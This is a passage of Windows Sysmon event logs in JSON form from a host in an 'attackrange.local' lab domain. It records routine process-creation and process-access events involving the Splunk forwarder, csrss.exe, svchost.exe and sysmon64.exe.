ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:29.432","ProcessGuid":"{E2A3D6B1-1079-5F25-0000-00107A420400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2392,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:29.614\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 4028\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1079-5F25-0000-00107A420400}\r\nTargetProcessId: 3780\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:29.614","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"4028","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1079-5F25-0000-00107A420400}","TargetProcessId":"3780","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2393,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:29.630\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1079-5F25-0000-00107A420400}\r\nTargetProcessId: 3780\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:29.630","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1079-5F25-0000-00107A420400}","TargetProcessId":"3780","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2394,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:29.630\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:29.630","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2395,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:29.630\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:29.630","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2396,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:29.630\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:29.630","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2397,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:29.630\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:29.630","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2398,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:29.630\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:29.630","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2399,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:29.630\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:29.630","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTE